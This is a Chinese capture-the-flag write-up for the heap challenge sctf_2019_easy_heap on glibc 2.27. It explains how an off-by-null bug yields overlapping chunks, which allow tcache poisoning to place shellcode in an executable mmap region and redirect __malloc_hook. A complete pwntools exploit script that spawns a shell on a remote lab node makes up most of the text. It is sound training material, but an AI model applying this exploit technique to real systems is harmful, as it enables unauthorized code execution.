CTF：sctf_2019_easy_heap

这个题目当时比赛的时候靶机据说是ubuntu16.04，但是迁移到buu上就变成了ubuntu18.04，下面针对两个平台给出不同的解法，先写一下18.04下的

先来逆一下，关键点有一下几个

mmap了一个可读可写可执行的内存空间，可以往里面写入shellcode，而且给了我们地址

edit函数里面有off-by-null漏洞

ubuntu18.04

我本来想直接爆破_IO_2_1_stdout_的，但是考虑到18.04下malloc的时候不会检查size，所以程序不会crash掉，当然理论也可以爆破（当p.recvuntil接受不到数据时程序会crash），但是没有去尝试，过几天试一下

现在考虑写入shellcode，然后攻击__malloc_hook

先说一下程序模板

**step 1: allocate mmap to read in shellcode**
add(0x410)  add(0x68)  add(0x4f0)  add(0x68)free(0x410)
edit(0x68 -> off-by-null)
free(0x4f0)add(0x410)
add(0x68)      # index 2: the same as index 1free(0x68)      # index 3
free(0x68)       # idx 1(free) == idx 2(allocate)
free(0x68)      # idx 1(free) == idx 2(free)add(0x68)      # index 1(allocate) == 2(free)
add(0x68)      # index 2(allocate) == 1(allocate)
add(0x68)      # mmap**step 2: attack __malloc_hook**
add(0x4f0)free(0x410)
edit(0x68 -> off-by-null)free(0x68)      # index 1(free) == 2(allocate)
free(0x4f0)      #注意，这个地方必须先free 0x68，否则此后将无法通过free的检查
edit(2,'\x30')add(0x68)     add(0x68)
edit(0x68)  to getshell

核心，利用off-by-null构造两个指向同一块chunk的指针

exp:

from pwn import *'''
author: lemon
time: 2020-10-19
libc: libc-2.27.so
python version: python3
'''local = 0binary = "sctf_2019_easy_heap"
libc_path = './libc-2.27.so'
port = "27263"if local == 1:
p = process(binary)
else:
p = remote("node3.buuoj.cn",port)def dbg():
context.log_level = 'debug'context.terminal = ['tmux','splitw','-h']
context(arch = 'amd64',os = 'linux')def add(size):
p.sendlineafter('>> ','1')
p.sendlineafter('Size: ',str(size))def edit(index,content):
p.sendlineafter('>> ','3')
p.sendlineafter('Index:',str(index))
p.sendafter('Content:',content)def free(index):
p.sendlineafter('>> ','2')
p.sendlineafter('Index:',str(index))p.recvuntil('0x')
mmap = int(p.recv(10),16)
print("[*] mmap:" + hex(mmap))add(0x410)#0
p.recvuntil('0x')
heap_addr = int(p.recv(12),16)
print("[*] heap array:",hex(heap_addr))add(0x68)# 1
add(0x4f0)# 2
add(0x68)# 3payload = b'A' * 0x60 + p64(0x490)free(0)# free 0x410
edit(1,payload)
free(2)add(0x410)# 0 size: 0x410
add(0x68)# 2 size: 0x68  2(allocate) == 1(allocate)free(3)
free(1)
free(2)add(0x68)# 1 2(free) == 1(allocate)
edit(1,p64(mmap) + b'\n')
add(0x68)# 2 2(allocate) == 1(allocate)
add(0x68)# 3shellcode = asm(shellcraft.sh())
edit(3,shellcode + b'\n')add(0x4f0)# 4free(0)
edit(1,payload)# 2(allocate) == 1(allocate)
free(1)# 1(free) == 2(allocate)
free(4)add(0x410)# 0
edit(2,'\x30\n')add(0x68)# 1(allocate) == 2(allocate)
add(0x68)# 4 __malloc_hookedit(4,p64(mmap) + b'\n')add(0x20)# getshell
# gdb.attach(p)
p.interactive()

过几天再更一下ubuntu16.04下的版本，相对于18.04，16.04利用更简单一些，甚至可以直接爆破_IO_2_1_stdout_